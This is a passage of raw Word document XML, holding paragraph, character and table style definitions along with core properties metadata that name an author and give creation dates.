      <w:color w:val="171717"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:aliases w:val="IPS Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsia="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Constantia"/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Constantia"/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid3">
    <w:name w:val="Table Grid3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00D55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6">
    <w:name w:val="Table Grid6"/>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qFormat/>
    <w:rsid w:val="00950B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rustotal.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Jawed</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mehwish Jawed</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-09T14:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-09T14:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>